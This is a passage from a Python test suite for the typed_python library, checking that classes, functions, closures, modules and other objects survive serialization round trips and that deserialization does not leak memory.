x.deserialize(x.serialize(d))
usage = currentMemUsageMb()
for passIx in range(30):
x.deserialize(x.serialize(d))
self.assertLess(currentMemUsageMb(), usage+2)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_set_doesnt_leak(self):
s = set(range(1000000))
x = SerializationContext()
x.deserialize(x.serialize(s))
usage = currentMemUsageMb()
for _ in range(10):
x.deserialize(x.serialize(s))
print(currentMemUsageMb())
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_tuple_doesnt_leak(self):
s = tuple(range(1000000))
x = SerializationContext()
x.deserialize(x.serialize(s))
usage = currentMemUsageMb()
for _ in range(10):
x.deserialize(x.serialize(s))
print(currentMemUsageMb())
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_list_doesnt_leak(self):
s = list(range(1000000))
x = SerializationContext()
x.deserialize(x.serialize(s))
usage = currentMemUsageMb()
for _ in range(10):
x.deserialize(x.serialize(s))
print(currentMemUsageMb())
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_class_doesnt_leak(self):
class C(Class, Final):
x = Member(int)
def f(self, x=10):
return 10
x = SerializationContext()
msg = x.serialize(C)
x.deserialize(msg)
usage = currentMemUsageMb()
for passIx in range(1000):
x.deserialize(msg)
self.assertLess(currentMemUsageMb(), usage+.5)
def test_serialize_named_tuples_with_extra_fields(self):
T1 = NamedTuple(x=int)
T2 = NamedTuple(x=int, y=float, z=str)
self.assertEqual(
deserialize(T2, serialize(T1, T1(x=10))),
T2(x=10, y=0.0, z="")
)
def test_serialize_listof(self):
T = ListOf(int)
aList = T()
aPopulatedList = T([1, 2, 3])
self.assertEqual(aList, deserialize(T, serialize(T, aList)))
self.assertEqual(refcount(deserialize(T, serialize(T, aList))), 1)
self.assertEqual(aPopulatedList, deserialize(T, serialize(T, aPopulatedList)))
self.assertEqual(refcount(deserialize(T, serialize(T, aPopulatedList))), 1)
def test_serialize_classes(self):
class AClass(Class, Final):
x = Member(int)
y = Member(float)
T = Tuple(AClass, AClass)
a = AClass(x=10, y=20.0)
a2, a2_copy = deserialize(T, serialize(T, (a, a)))
self.assertEqual(a2.x, 10)
a2.x = 300
self.assertEqual(a2_copy.x, 300)
a2_copy = None
self.assertEqual(refcount(a2), 1)
def test_embedded_messages(self):
T = NamedTuple(x=TupleOf(int))
T_with_message = NamedTuple(x=EmbeddedMessage)
T_with_two_messages = NamedTuple(x=EmbeddedMessage, y=EmbeddedMessage)
T2 = NamedTuple(x=TupleOf(int), y=TupleOf(int))
t = T(x=(1, 2, 3, 4))
tm = deserialize(T_with_message, serialize(T, t))
tm2 = T_with_two_messages(x=tm.x, y=tm.x)
t2 = deserialize(T2, serialize(T_with_two_messages, tm2))
self.assertEqual(t2.x, t.x)
self.assertEqual(t2.y, t.x)
def test_serialize_untyped_classes(self):
sc = SerializationContext()
class B:
def __init__(self, x):
self.x = x
def g(self):
return self.x
class C(B):
def f(self):
return self.x + 10
C2 = sc.deserialize(sc.serialize(C))
self.assertEqual(C2(20).f(), 30)
self.assertEqual(C2(20).g(), 20)
def test_serialize_functions_with_return_types(self):
sc = SerializationContext()
@Function
def f(x) -> int:
return x
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(10.5), 10)
def test_serialize_functions_with_annotations(self):
sc = SerializationContext()
B = int
C = 10
@Function
def f(x: B = C) -> B:
return x
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(10.5), 10)
with self.assertRaises(TypeError):
f2("hi")
self.assertEqual(f(), f2())
def test_serialize_typed_classes(self):
sc = SerializationContext()
class B(Class):
x = Member(int)
def f(self, y) -> int:
return self.x + y
class C(B, Final):
y = Member(int)
def g(self):
return self.x + self.y
B2 = sc.deserialize(sc.serialize(B))
self.assertEqual(
B2(x=10).f(20),
B(x=10).f(20)
)
C2 = sc.deserialize(sc.serialize(C))
self.assertEqual(
C2(x=10, y=30).f(20),
C(x=10, y=30).f(20)
)
self.assertEqual(
C2(x=10, y=30).g(),
C(x=10, y=30).g()
)
def test_serialize_recursive_typed_classes(self):
sc = SerializationContext()
B = Forward("B")
@B.define
class B(Class, Final):
x = Member(int)
def f(self, y) -> int:
return self.x + y
def getSelf(self) -> B:
return self
B2 = sc.deserialize(sc.serialize(B))
assert identityHash(B) == identityHash(B2)
instance = B2()
self.assertTrue(isinstance(instance.getSelf(), B))
self.assertTrue(isinstance(instance.getSelf(), B2))
B3 = sc.deserialize(sc.serialize(B2))
instance2 = B3()
self.assertTrue(isinstance(instance2.getSelf(), B))
self.assertTrue(isinstance(instance2.getSelf(), B2))
self.assertTrue(isinstance(instance2.getSelf(), B3))
def test_serialize_functions_with_cells(self):
def fMaker():
@Entrypoint
def g(x):
return x + 1
@Entrypoint
def f(x):
return g(x)
return f
sc = SerializationContext()
f = fMaker()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(10), 11)
def test_reserialize_functions(self):
sc = SerializationContext({'Entrypoint': Entrypoint})
with tempfile.TemporaryDirectory() as tf:
fpath = os.path.join(tf, "module.py")
with open(fpath, "w") as f:
someText = textwrap.dedent("""
from typed_python import Forward, Class, Final, Member, Entrypoint
@Entrypoint
def g(x):
return x + 1
@Entrypoint
def f(x):
return g(x)
def getH():
y = (lambda x: x + 3, lambda x: x + 4)
@Entrypoint
def h(x):
return (y[0](x), y[1](x))
return h
""")
f.write(someText)
code = compile(someText, fpath, "exec")
moduleVals = {}
exec(code, moduleVals)
f = moduleVals['f']
getH = moduleVals['getH']
f2 = sc.deserialize(sc.serialize(f))
getH2 = sc.deserialize(sc.serialize(getH))
self.assertEqual(f2(10), 11)
# clear the ast's filesystem cache.
python_ast_util.clearAllCaches()
# make sure we can still serialize 'f' itself
sc.serialize(f)
sc.serialize(getH())
# now the directory is deleted. When we reserialize it we shouldn't
# need it because it should be stashed in the ast cache.
h = getH2()
f3 = sc.deserialize(sc.serialize(f2))
h2 = sc.deserialize(sc.serialize(h))
self.assertEqual(f3(10), 11)
self.assertEqual(h2(10), (13, 14))
def test_serialize_unnamed_classes_retains_identity(self):
sc = SerializationContext()
class B:
def f(self):
return B
B2 = sc.deserialize(sc.serialize(B))
assert B2 is B
assert B2().f() is B2
assert B().f() is B2
def test_serialize_unnamed_typed_classes_retains_identity(self):
sc = SerializationContext()
class B(Class):
def f(self) -> object:
return B
B2 = sc.deserialize(sc.serialize(B))
assert B2 is B
assert B2().f() is B2
assert B().f() is B2
def test_serialize_lambda_preserves_identity_hash(self):
sc = SerializationContext()
def aFunction(self, x):
sys
return 10
aFunction2 = sc.deserialize(sc.serialize(aFunction))
assert identityHash(aFunction) == identityHash(aFunction2)
def test_serialize_subclasses(self):
sc = SerializationContext()
class B(Class):
x = Member(int)
class C1(B, Final):
f = Member(float)
class C2(B, Final):
b = Member(B)
aList = ListOf(B)()
aList.append(B(x=10))
aList.append(C1(x=20, f=30.5))
aList.append(C2(x=30, b=aList[0]))
aList2 = sc.deserialize(sc.serialize(aList))
B2 = type(aList2[0])
C12 = type(aList2[1])
C22 = type(aList2[2])
self.assertTrue(issubclass(C12, B2))
self.assertTrue(issubclass(C22, B2))
self.assertEqual(aList2[0].x, 10)
self.assertEqual(aList2[1].x, 20)
self.assertEqual(aList2[2].x, 30)
self.assertEqual(aList2[2].b.x, 10)
# verify that the reference in aList2[2].b points at aList2[0]
aList2[2].b.x = 100
self.assertEqual(aList2[0].x, 100)
def test_serialize_subclasses_multiple_views(self):
sc = SerializationContext()
class B(Class):
x = Member(int)
class C1(B):
x2 = Member(int)
class C2(C1):
x3 = Member(int)
class C3(C2):
x4 = Member(int)
c = C3()
t = Tuple(C3, C1, C2, B)((c, c, c, c))
t = sc.deserialize(sc.serialize(t))
t[0].x4 = 2
for e in t:
self.assertEqual(e.x4, 2)
def test_serialize_classes_with_staticmethods_and_properties(self):
sc = SerializationContext()
class B:
@staticmethod
def f(x):
return x + 1
@property
def p(self):
return 11
B2 = sc.deserialize(sc.serialize(B))
self.assertEqual(B2.f(10), 11)
self.assertEqual(B().p, 11)
def test_roundtrip_serialization_of_functions_with_annotations(self):
T = int
def f() -> T:
return 1
sc = SerializationContext()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(), 1)
f2Typed = Function(f2)
self.assertEqual(f2Typed.overloads[0].returnType, int)
def test_roundtrip_serialization_of_functions_with_defaults(self):
def f(x=10, *, y=20):
return x + y
sc = SerializationContext()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(), 30)
def test_roundtrip_serialization_of_functions_with_closures(self):
F = int
@Function
def f():
return float(moduleLevelIdentityFunction(F(1)))
def fWrapper():
return f()
sc = SerializationContext()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(), 1)
fWrapper2 = sc.deserialize(sc.serialize(fWrapper))
self.assertEqual(fWrapper2(), 1)
def test_serialize_many_large_equivalent_strings(self):
sc = SerializationContext()
def f(x):
return " " * x + "hi" * x
someStrings = [f(1000) for _ in range(100)]
someStrings2 = [f(1000) for _ in range(101)]
# we memoize strings, so this should be cheap
self.assertLess(
len(sc.serialize(someStrings2)) - len(sc.serialize(someStrings)),
20
)
def test_serialize_class_with_classmethod(self):
class ClassWithClassmethod(Class, Final):
@classmethod
def ownName(cls):
return str(cls)
sc = SerializationContext()
ClassWithClassmethod2 = sc.deserialize(sc.serialize(ClassWithClassmethod))
self.assertEqual(
ClassWithClassmethod2.ownName(),
ClassWithClassmethod.ownName(),
)
def test_serialize_class_with_nontrivial_signatures(self):
N = NamedTuple(x=int, y=float)
class ClassWithStaticmethod(Class, Final):
@staticmethod
def hi(x: ListOf(N)):
return len(x)
sc = SerializationContext()
ClassWithStaticmethod2 = sc.deserialize(sc.serialize(ClassWithStaticmethod))
lst = ListOf(N)()
lst.resize(2)
self.assertEqual(
ClassWithStaticmethod2.hi(lst),
ClassWithStaticmethod.hi(lst),
)
def test_serialize_class_simple(self):
sc = SerializationContext()
self.assertTrue(
sc.deserialize(sc.serialize(C)) is C
)
def test_serialize_unnamed_alternative(self):
X = Alternative("X", A={}, B={'x': int})
sc = SerializationContext()
self.assertTrue(
sc.deserialize(sc.serialize(X)).B(x=2).x == 2
)
def test_serialize_mutually_recursive_unnamed_forwards_alternatives(self):
X1 = Forward("X1")
X2 = Forward("X2")
X1 = X1.define(Alternative("X1", A={}, B={'x': X2}))
X2 = X2.define(Alternative("X2", A={}, B={'x': X1}))
sc = SerializationContext()
sc.deserialize(sc.serialize(X1))
def test_serialize_mutually_recursive_unnamed_forwards_tuples(self):
X1 = Forward("X1")
X2 = Forward("X2")
X1 = X1.define(TupleOf(OneOf(int, X2)))
X2 = X2.define(TupleOf(OneOf(float, X1)))
self.assertTrue(isRecursive(X1))
self.assertTrue(isRecursive(X2))
self.assertIs(X1.ElementType.Types[1], X2)
self.assertIs(X2.ElementType.Types[1], X1)
sc = SerializationContext().withoutCompression()
sc.deserialize(sc.serialize(X1))
def test_serialize_named_alternative(self):
self.assertEqual(
ModuleLevelAlternative.__module__,
"typed_python.types_serialization_test"
)
sc = SerializationContext()
self.assertIs(
sc.deserialize(sc.serialize(ModuleLevelAlternative)),
ModuleLevelAlternative
)
def test_serialize_unnamed_recursive_alternative(self):
X = Forward("X")
X = X.define(
Alternative("X", A={}, B={'x': int}, C={'anX': X})
)
sc = SerializationContext()
self.assertTrue(
sc.deserialize(sc.serialize(X)).B(x=2).x == 2
)
def test_serialize_module_level_class(self):
assert ModuleLevelClass.__module__ == 'typed_python.types_serialization_test'
sc = SerializationContext().withoutCompression()
self.assertIs(sc.deserialize(sc.serialize(ModuleLevelClass)), ModuleLevelClass)
self.assertIn(
b'typed_python.types_serialization_test.ModuleLevelClass',
sc.serialize(ModuleLevelClass),
)
def test_serialize_unnamed_subclass_of_named_tuple(self):
class SomeNamedTuple(NamedTuple(x=int)):
def f(self):
return self.x
sc = SerializationContext()
self.assertEqual(
sc.deserialize(sc.serialize(SomeNamedTuple))(x=10).f(),
10
)
self.assertEqual(
sc.deserialize(sc.serialize(SomeNamedTuple(x=10))).f(),
10
)
def test_serialize_named_subclass_of_named_tuple(self):
sc = SerializationContext()
self.assertEqual(
ModuleLevelNamedTupleSubclass.__module__,
"typed_python.types_serialization_test"
)
self.assertEqual(
ModuleLevelNamedTupleSubclass.__name__,
"ModuleLevelNamedTupleSubclass"
)
self.assertIs(
sc.deserialize(sc.serialize(ModuleLevelNamedTupleSubclass)),
ModuleLevelNamedTupleSubclass
)
self.assertIs(
type(sc.deserialize(sc.serialize(ModuleLevelNamedTupleSubclass()))),
ModuleLevelNamedTupleSubclass
)
self.assertIs(
type(sc.deserialize(sc.serialize([ModuleLevelNamedTupleSubclass()]))[0]),
ModuleLevelNamedTupleSubclass
)
self.assertIs(
sc.deserialize(sc.serialize(ModuleLevelNamedTupleSubclass(x=10))).f(),
10
)
def test_serialize_builtin_tp_functions(self):
sc = SerializationContext()
for thing in [
TupleOf, ListOf, OneOf, Tuple, NamedTuple, Class,
Member, ConstDict, Alternative, serialize, deserialize,
Dict, Set, SerializationContext, EmbeddedMessage,
serializeStream, deserializeStream, decodeSerializedObject,
Forward, Final, Function, Entrypoint
]:
self.assertIs(
sc.deserialize(sc.serialize(thing)), thing
)
def test_serialize_methods_on_named_classes(self):
sc = SerializationContext()
m1 = ModuleLevelNormalClass.method
m2 = sc.deserialize(sc.serialize(m1))
assert sc.nameForObject(m1) is not None
print(m1, m2)
self.assertIs(m1, m2)
def test_serialize_entrypointed_modulelevel_functions(self):
sc = SerializationContext()
self.assertIs(
type(moduleLevelEntrypointedFunction),
sc.deserialize(sc.serialize(type(moduleLevelEntrypointedFunction)))
)
self.assertIs(
type(moduleLevelEntrypointedFunction),
type(sc.deserialize(sc.serialize(moduleLevelEntrypointedFunction)))
)
def test_serialize_entrypointed_modulelevel_class_functions(self):
sc = SerializationContext()
self.assertIs(
type(ModuleLevelClass.f),
sc.deserialize(sc.serialize(type(ModuleLevelClass.f)))
)
self.assertIs(
type(ModuleLevelClass.f),
type(sc.deserialize(sc.serialize(ModuleLevelClass.f)))
)
def test_serialize_type_function(self):
sc = SerializationContext()
self.assertIs(
FancyClass(int),
sc.deserialize(sc.serialize(FancyClass(int)))
)
def test_serialize_module_level_recursive_forward(self):
sc = SerializationContext()
self.assertIs(
ModuleLevelRecursiveForward,
sc.deserialize(sc.serialize(ModuleLevelRecursiveForward))
)
def test_serialize_reference_to_module_level_constant(self):
sc = SerializationContext()
getter = sc.deserialize(sc.serialize(moduleLevelDictGetter(10)))
assert getter()[0] is moduleLevelDict
def test_serialize_type_with_reference_to_self_through_closure(self):
@Entrypoint
def f(x):
if x < 0:
return 0
return x + C.anF(x-1)
class C:
anF = f
assert f(100) == sum(range(101))
# C and 'f' are mutually recursive
sc.deserialize(sc.serialize(C))
def test_serialize_cell_type(self):
sc = SerializationContext().withoutInternalizingTypeGroups()
def f():
return sc
cellType = type(f.__closure__[0])
assert sc.deserialize(sc.serialize(cellType)) is cellType
def test_serialize_self_referencing_class(self):
sc = SerializationContext().withoutCompression().withoutInternalizingTypeGroups()
def g(x):
return 10
@TypeFunction
def C(T):
class C_(Class, Final):
@Entrypoint
def s(self):
return C_
@Entrypoint
def g(self):
return g(10)
return C_
C1 = C(int)
C2 = sc.deserialize(sc.serialize(C1))
c1 = C1()
c2 = C2()
assert c2.g() == 10
assert c2.s() is C2
# this should dispatch but we can't assume which compiled version
        # of the code we'll get, so we can't check identity of C2
assert c1.g() == 10
def test_serialize_self_referencing_class_through_tuple(self):
sc = SerializationContext().withoutCompression().withoutInternalizingTypeGroups()
def g(x):
return 10
@TypeFunction
def C(T):
class C_(Class, Final):
@Function
def s(self):
return tup[0]
@Function
def g(self):
return g(10)
            # this fails because when we serialize mutually recursive python objects
# we don't understand all the kinds of objects we can walk
tup = (C_, 10)
return C_
C1 = C(int)
C2 = sc.deserialize(sc.serialize(C1))
c1 = C1()
c2 = C2()
assert c2.g() == 10
assert c2.s() is C2
assert c1.g() == 10
assert c1.s() is C1
def test_names_of_builtin_alternatives(self):
sc = SerializationContext().withoutCompression().withoutInternalizingTypeGroups()
assert sc.nameForObject(Expression) is not None
assert sc.nameForObject(Expression.Load) is not None
assert b'Store' not in sc.serialize(Expression)
assert b'Store' not in sc.serialize(Expression.Load)
sc.deserialize(sc.serialize(Expression))
sc.deserialize(sc.serialize(Expression.Load))
assert sc.deserialize(sc.serialize(native_ast.Type)) is native_ast.Type
assert sc.deserialize(sc.serialize(TupleOf(native_ast.Type))) is TupleOf(native_ast.Type)
assert sc.deserialize(sc.serialize(NamedCallTarget)) is NamedCallTarget
assert len(sc.serialize(native_ast.Type)) < 100
assert len(sc.serialize(TupleOf(native_ast.Type))) < 100
def test_badly_named_module_works(self):
sc = SerializationContext()
assert sc.objectFromName(".modules.NOT.A.REAL.MODULE") is None
def test_can_serialize_nullptrs(self):
x = PointerTo(int)()
sc = SerializationContext()
assert sc.deserialize(sc.serialize(type(x))) == type(x)
assert sc.deserialize(sc.serialize(x)) == x
def test_can_serialize_subclassOf(self):
class C(Class):
pass
class D(C):
pass
T = SubclassOf(C)
lst = ListOf(SubclassOf(C))([C, D])
sc = SerializationContext()
assert sc.deserialize(sc.serialize(T)) is T
assert sc.deserialize(sc.serialize(lst)) == lst
def test_can_serialize_nested_function_references(self):
sc = SerializationContext().withoutInternalizingTypeGroups()
def lenProxy(x):
return len(x)
otherGlobals = {'__builtins__': __builtins__}
lenProxyWithNonstandardGlobals = buildPyFunctionObject(
lenProxy.__code__,
otherGlobals,
()
)
assert lenProxy("asdf") == 4
assert lenProxyWithNonstandardGlobals("asdf") == 4
lenProxyDeserialized = sc.deserialize(sc.serialize(lenProxyWithNonstandardGlobals))
assert lenProxyDeserialized("asdf") == 4
@pytest.mark.skipif('sys.platform=="darwin"')
def test_set_closure_doesnt_leak(self):
def makeFunWithClosure(x):
def f():
return x
return f
aFun = makeFunWithClosure(10)
mem = currentMemUsageMb()
for i in range(1000000):
setFunctionClosure(aFun, makeFunWithClosure(20).__closure__)
assert currentMemUsageMb() < mem + 1
def test_serialize_without_line_info_doesnt_have_path(self):
def aFun():
return 10
sc = SerializationContext().withoutCompression().withoutLineInfoEncoded()
assert b'types_serialization_test' not in sc.serialize(aFun.__code__)
assert b'types_serialization_test' not in sc.serialize(aFun.__code__)
def test_serialize_builtin_type_objects(self):
s = SerializationContext()
def check(x):
assert s.deserialize(s.serialize(x)) is x
check(types.BuiltinFunctionType)
check(types.FunctionType)
check(types.ModuleType)
def test_serialize_self_referential_class(self):
class SeesItself:
@staticmethod
def factory(kwargs):
return lambda a, b, c: SeesItself(a, b, c)
@property
def seeItself(self, a, b, c, d):
return SeesItself
c = SerializationContext().withoutInternalizingTypeGroups()
c.deserialize(c.serialize(SeesItself))
def test_serialize_anonymous_module(self):
with tempfile.TemporaryDirectory() as tf:
c = SerializationContext().withFunctionGlobalsAsIs()
aModule = types.ModuleType("mymodule")
CONTENT = (
"y = 10\n"
"def f(x):\n"
" return x + y\n"
)
fname = os.path.join(tf, "mymodule.py")
with open(fname, "w") as f:
f.write(CONTENT)
exec(compile(CONTENT, fname, "exec"), aModule.__dict__)
assert aModule.f(10) == 20
aModule2 = c.deserialize(c.serialize(aModule))
assert aModule2.f(10) == 20
# verify the reference to the module object is correct
aModule2.y = 30
assert aModule2.f(10) == 40
def test_serialize_locks(self):
l = threading.Lock()
x = (l, l)
sc = SerializationContext()
x2 = sc.deserialize(sc.serialize(x))
assert x2[0] is x2[1] and isinstance(x2[0], type(x[0]))
def test_serialize_methods(self):
sc = SerializationContext()
assert sc.deserialize(sc.serialize(ModuleLevelClass().f))() == "HI!"
def test_can_deserialize_anonymous_class_methods(self):
class Cls:
def f(self):
return Cls
assert callFunctionInFreshProcess(Cls().f, ()) is Cls
def test_can_deserialize_untyped_forward_class_methods(self):
Cls = Forward("Cls")
@Cls.define
class Cls:
# recall that regular classes ignore their annotations
def f(self) -> Cls:
return "HI"
assert callFunctionInFreshProcess(Cls, ()).f() == "HI"
def test_can_deserialize_forward_class_methods_tp_class(self):
Cls = Forward("Cls")
@Cls.define
class Cls(Class):
m = Member(str)
def f(self) -> Cls:
return Cls(m='HI')
assert callFunctionInFreshProcess(Cls, ()).f().m == "HI"
def test_can_deserialize_forward_class_methods_tp_class_no_self_reference(self):
Cls = Forward("Cls")
@Cls.define
class Cls(Class):
m = Member(str)
def f(self) -> str:
return "HI"
assert callFunctionInFreshProcess(Cls, ()).f() == "HI"
def test_deserialize_regular_class_retains_identity(self):
class Cls:
# recall that regular classes ignore their annotations
def f(self):
Cls
return "HI"
Cls2 = type(callFunctionInFreshProcess(Cls, ()))
assert identityHash(Cls).hex() == identityHash(Cls2).hex()
@pytest.mark.skipif(
"sys.version_info.minor >= 8",
reason="serialization differences on 3.8 we need to investigate"
)
def test_identity_of_function_with_annotation_stable(self):
def makeFunction():
@Entrypoint
def f(x: float):
return x + 1
return (f, identityHash(f))
f, identityHashOfF = callFunctionInFreshProcess(makeFunction, ())
assert identityHash(f) == identityHashOfF
@pytest.mark.skipif(
"sys.version_info.minor >= 8",
reason="serialization differences on 3.8 we need to investigate"
)
def test_identity_of_function_with_default_value_stable(self):
def makeFunction():
@Entrypoint
def f(x=None):
return x + 1
return (f, identityHash(f))
f, identityHashOfF = callFunctionInFreshProcess(makeFunction, ())
assert identityHash(f) == identityHashOfF
@pytest.mark.skip(reason='broken')
def test_deserialize_untyped_class_in_forward_retains_identity(self):
# this still breaks because we have some inconsistency between how
# the MRTG gets created after deserialization when we have a regular
# python class in a forward like this.
Cls = Forward("Cls")
@Cls.define
class Cls:
def f(self) -> Cls:
return Cls()
Cls2 = type(callFunctionInFreshProcess(Cls, ()))
l = recursiveTypeGroupDeepRepr(Cls).split("\n")
r = recursiveTypeGroupDeepRepr(Cls2).split("\n")
while len(l) < len(r):
l.append("")
while len(r) < len(l):
r.append("")
def pad(x):
x = x[:120]
x = x + " " * (120 - len(x))
return x
for i in range(len(l)):
print(pad(l[i]), " " if l[i] == r[i] else " != ", pad(r[i]))
assert identityHash(Cls) == identityHash(Cls2)
def test_deserialize_tp_class_retains_identity(self):
Cls = Forward("Cls")
@Cls.define
class Cls(Class):
# recall that regular classes ignore their annotations
def f(self) -> Cls:
return Cls()
Cls2 = type(callFunctionInFreshProcess(Cls, ()))
assert identityHash(Cls) == identityHash(Cls2)
def test_call_method_dispatch_on_two_versions_of_same_class_with_recursion_defined_in_host(self):
Base = Forward("Base")
@Base.define
class Base(Class):
def blah(self) -> Base:
return self
def f(self, x) -> int:
return x + 1
class Child(Base, Final):
def f(self, x) -> int:
return -1
aChild = Child()
aChildBytes = SerializationContext().serialize(aChild)
def deserializeAndCall(someBytes):
@Entrypoint
def callF(x):
return x.f(10)
aChild = SerializationContext().deserialize(someBytes)
aChild2 = SerializationContext().deserialize(someBytes)
assert identityHash(aChild) == identityHash(aChild2)
if callF(aChild) == callF(aChild2):
return "OK"
else:
return "FAILED"
assert callFunctionInFreshProcess(deserializeAndCall, (aChildBytes,)) == "OK"
def test_call_method_dispatch_on_two_versions_of_self_referential_class_produced_differently(self):
def deserializeAndCall():
Base = Forward("Base")
@Base.define
class Base(Class):
def blah(self) -> Base:
return self
def f(self, x) -> int:
return x + 1
@Entrypoint
def callF(x: Base):
return x.f(10)
class Child(Base, Final):
def f(self, x) -> int:
return -1
return Child(), callF
child1, callF1 = callFunctionInFreshProcess(deserializeAndCall, ())
child2, callF2 = callFunctionInFreshProcess(deserializeAndCall, ())
assert identityHash(child1) == identityHash(child2)
assert identityHash(callF1) == identityHash(callF2)
assert type(child1) is type(child2)
assert type(callF1) is type(callF2)
assert callF1(child1) == callF2(child2)
def test_deserialize_anonymous_recursive_base_and_subclass(self):
def deserializeAndCall():
Base = Forward("Base")
Child = Forward("Child")
@Base.define
class Base(Class):
def blah(self) -> Child:
return Child()
def f(self, x) -> int:
return x + 1
@Child.define
class Child(Base, Final):
def f(self, x) -> int:
return -1
@Entrypoint
def callF(x: Child):
return x.f(10)
return Base, callF
Base1, callF1 = callFunctionInFreshProcess(deserializeAndCall, ())
Base2, callF2 = callFunctionInFreshProcess(deserializeAndCall, ())
assert identityHash(Base1) == identityHash(Base2)
assert identityHash(callF1) == identityHash(callF2)
assert Base1 is Base2
assert type(callF1) is type(callF2)
child1 = Base1().blah()
child2 = Base2().blah()
assert callF1(child1) == callF2(child2)
def test_identity_hash_of_lambda_doesnt_change_serialization(self):
s = SerializationContext()
f = lambda: 10
ser1 = s.serialize(f)
identityHash(f)
ser2 = s.serialize(f)
assert ser1 == ser2
def test_call_method_dispatch_on_two_versions_of_same_class_with_recursion(self):
Base = Forward("Base")
@Base.define
class Base(Class):
def blah(self) -> Base:
return self
def f(self, x) -> int:
return x + 1
@Entrypoint
def callF(x: Base):
return x.f(10)
identityHash(Base)
def deserializeAndCall():
class Child(Base, Final):
def f(self, x) -> int:
return -1
assert isinstance(Child(), Base)
return SerializationContext().serialize(Child())
childBytes = callFunctionInFreshProcess(deserializeAndCall, ())
child1 = SerializationContext().deserialize(childBytes)
child2 = SerializationContext().deserialize(childBytes)
assert type(child1) is type(child2)
childVersionOfBase = type(child1).BaseClasses[0]
assert typesAreEquivalent(Base, childVersionOfBase)
print(type(child1).BaseClasses)
assert Base in type(child1).BaseClasses
assert callF(child1) == callF(child2)
@pytest.mark.skipif(
"sys.version_info.minor >= 8",
reason="serialization differences on 3.8 we need to investigate"
)
def test_serialization_of_entrypointed_function_stable(self):
def returnSerializedForm():
s = SerializationContext().withoutCompression()
@Entrypoint
def aFun():
return 1
return s.serialize(aFun)
childBytes = callFunctionInFreshProcess(returnSerializedForm, ())
childFun = (
SerializationContext()
.withoutCompression()
.withoutInternalizingTypeGroups()
.deserialize(childBytes)
)
childBytes2 = (
SerializationContext()
.withoutCompression()
.withoutInternalizingTypeGroups()
.serialize(childFun)
)
if childBytes != childBytes2:
decoded1 = decodeSerializedObject(childBytes)
decoded2 = decodeSerializedObject(childBytes2)
decoded1Print = dict(enumerate(pprint.PrettyPrinter(indent=2).pformat(decoded1).split("\n")))
decoded2Print = dict(enumerate(pprint.PrettyPrinter(indent=2).pformat(decoded2).split("\n")))
def pad(x):
x = str(x)[:100]
x = x + " " * (100 - len(x) )
return x
for k in range(max(len(decoded1Print), len(decoded2Print))):
print(
pad(decoded1Print.get(k)),
" " if decoded1Print.get(k) == decoded2Print.get(k) else " != ",
pad(decoded2Print.get(k))
)
assert childBytes == childBytes2
def test_serialize_abc_subclass(self):
# ensure we can serialize and hash anonymous classes descended from ABC
def makeClasses():
class BaseClass(ABC):
@abstractmethod
def f(self):
pass
class ChildClass(BaseClass):
def f(self):
return "concrete"
return (BaseClass, ChildClass, ChildClass())
BaseClass, ChildClass, childInstance = callFunctionInFreshProcess(makeClasses, ())
assert type(BaseClass) is ABCMeta
assert issubclass(ChildClass, BaseClass)
assert isinstance(childInstance, ChildClass)
assert isinstance(childInstance, BaseClass)
assert childInstance.f() == "concrete"
with self.assertRaisesRegex(TypeError, "abstract methods"):
BaseClass()
class ABadChildClass(BaseClass):
pass
with self.assertRaisesRegex(TypeError, "abstract methods"):
ABadChildClass()
class AnotherChildClass(BaseClass):
def f(self):
return "concrete2"
assert AnotherChildClass().f() == "concrete2"
def test_serialize_mutually_recursive_untyped_classes(self):
        # ensure we can serialize and hash mutually recursive anonymous (untyped) classes
def makeClasses():
class BaseClass:
@staticmethod
def getChild():
return ChildClass()
class ChildClass(BaseClass):
pass
return (BaseClass, ChildClass, recursiveTypeGroupDeepRepr(BaseClass))
BaseClass, ChildClass, deepRepr = callFunctionInFreshProcess(makeClasses, ())
assert type(BaseClass.getChild()) is ChildClass
def test_serialize_recursive_function(self):
        # ensure we can serialize and hash a recursive function rebuilt with custom globals
def makeF():
gl = {}
gl['moduleLevelRecursiveF'] = None
f = createFunctionWithLocalsAndGlobals(
moduleLevelRecursiveF.__code__,
gl
)
gl['moduleLevelRecursiveF'] = f
return f
f = callFunctionInFreshProcess(makeF, ())
assert f(10) == 10
def test_can_serialize_classes_with_methods_and_custom_globals(self):
def f(self):
return x # noqa
f = Function(createFunctionWithLocalsAndGlobals(f.__code__, {'x': 10}))
class Base(Class):
def func(self):
pass
class Child(Base):
func = f
s = SerializationContext().withoutInternalizingTypeGroups().withFunctionGlobalsAsIs()
Child2 = s.deserialize(s.serialize(Child))
assert Child2().func() == 10
def test_can_reserialize_deserialized_function_with_no_backing_file(self):
# when we serialize an anonymous function on one machine, where we have
# a definition for that code, we need to ensure that on another machine,
# where we don't have that file, we can still get access to the original
# AST. This is because we need the AST itself, not just the code object
# and we generate the AST from the original source code.
# this test builds a function on disk and serializes it in a separate process
# we then check that the file no longer exists but that we can still
# serialize it.
def makeF():
with tempfile.TemporaryDirectory() as tempdir:
path = os.path.join(tempdir, "asdf.py")
CONTENTS = (
"def anF(x):\n"
" if x > 0:\n"
" return anF(x - 1) + 1\n"
" return 0\n"
)
with open(path, "w") as f:
f.write(CONTENTS)
globals = {'__file__': path, '__name__': 'asdf'}
exec(
compile(CONTENTS, path, "exec"),
globals
)
s = SerializationContext()
return s.serialize(globals['anF'])
serializedF = callFunctionInFreshProcess(makeF, ())
f = SerializationContext().deserialize(serializedF)
f2serialized = SerializationContext().serialize(f)
f2 = SerializationContext().deserialize(f2serialized)
assert f(10) == f2(10)
def test_globals_of_entrypointed_functions_serialized_externally(self):
def makeC():
with tempfile.TemporaryDirectory() as tempdir:
path = os.path.join(tempdir, "asdf.py")
CONTENTS = (
"from typed_python import Entrypoint, ListOf, Class, Final\n"
"class C(Class, Final):\n"
